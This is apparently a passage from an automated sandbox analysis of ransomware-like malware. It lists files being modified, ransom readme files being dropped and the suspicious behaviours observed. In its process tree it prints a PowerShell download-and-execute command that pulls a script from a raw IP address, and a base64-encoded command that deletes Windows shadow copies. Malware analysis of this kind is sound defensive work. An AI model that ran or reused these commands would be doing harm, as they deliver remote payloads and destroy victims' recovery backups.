powershell.exe File opened for modification \??\c:\program files\ShowStep.dotm powershell.exe File opened for modification \??\c:\program files\StepFormat.ocx powershell.exe File opened for modification \??\c:\program files\UnregisterExit.xltm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\dc5v2ye0p9-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromInvoke.mhtml powershell.exe File opened for modification \??\c:\program files\DenyDisconnect.ogg powershell.exe File opened for modification \??\c:\program files\ReceiveOut.TS powershell.exe File opened for modification \??\c:\program files\StartCompare.crw powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\dc5v2ye0p9-readme.txt powershell.exe File opened for modification \??\c:\program files\InvokeUndo.pdf powershell.exe File opened for modification \??\c:\program files\UpdateBlock.crw powershell.exe File opened for modification \??\c:\program files (x86)\desktop.ini powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceoledb35.dll powershell.exe File opened for modification \??\c:\program files\CloseRevoke.pdf powershell.exe File opened for modification \??\c:\program files\CompressExpand.ini powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceme35.dll powershell.exe File opened for modification \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcese35.dll powershell.exe File created \??\c:\program files\dc5v2ye0p9-readme.txt powershell.exe File opened for modification \??\c:\program files\ConfirmExpand.bmp powershell.exe File opened for modification \??\c:\program files\ConnectStart.dotx powershell.exe File opened for modification \??\c:\program files\desktop.ini powershell.exe File created \??\c:\program files\microsoft sql server compact edition\dc5v2ye0p9-readme.txt powershell.exe File opened for modification \??\c:\program files\OpenWait.rtf powershell.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exeWerFault.exepid process 1052 powershell.exe 1052 powershell.exe 1052 powershell.exe 1772 powershell.exe 1772 powershell.exe 1332 WerFault.exe 1332 WerFault.exe 1332 WerFault.exe 1332 WerFault.exe 1332 WerFault.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1332 1216 WerFault.exe -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
powershell.exepid process 1052 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\TG4Rrn07.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/TG4Rrn07');Invoke-MWPGMZMBXDRKB;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Modifies system certificate store
- Drops desktop.ini file(s)
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops startup file
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1772
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1216 -s 30561⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Program crash
PID:1332